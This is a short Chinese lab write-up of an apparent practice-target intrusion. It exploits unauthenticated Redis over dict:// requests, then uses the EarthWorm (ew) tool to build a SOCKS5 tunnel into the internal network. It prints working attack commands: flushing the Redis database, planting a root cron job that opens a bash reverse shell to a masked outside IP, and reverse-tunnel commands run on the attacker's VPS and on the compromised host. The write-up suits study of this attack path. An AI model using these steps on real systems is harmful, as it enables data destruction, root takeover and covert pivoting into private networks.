最近在打一个靶机的时候遇到了ew做Socks5代理进行内网渗透,在这里做一下记录。

这里首先存在一个redis未授权访问

1
2
3
4
5
6
7
8
9
dict://172.19.0.5:6379/flushall //将整个redis数据库删除
dict://172.19.0.5:6379/set x "\n* * * * * bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1\n"
dict://172.19.0.5:6379/config set dir /var/spool/cron/
dict://172.19.0.5:6379/config set dbfilename root
dict://172.19.0.5:6379/save

然后
我拿到了redis服务器的root权限,扫描内网发现存在web服务。

然后在我的vps上执行

1
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

这里的意思就是监听1080和1024端口,攻击机访问1080端口,靶机访问1024端口

1
./ew -s rssocks -d xxx.xxx.xxx.xxx -e 1024数据库

这是在我拿到的redis服务器上执行的命令,建立起隧道连接。

这里在我的攻击机使用socks5代理,服务器地址填写我的vps地址,然后就可以直接在浏览器访问内网的web服务了。

当然这里也可以使用其他的socks5代理工具来进行代理。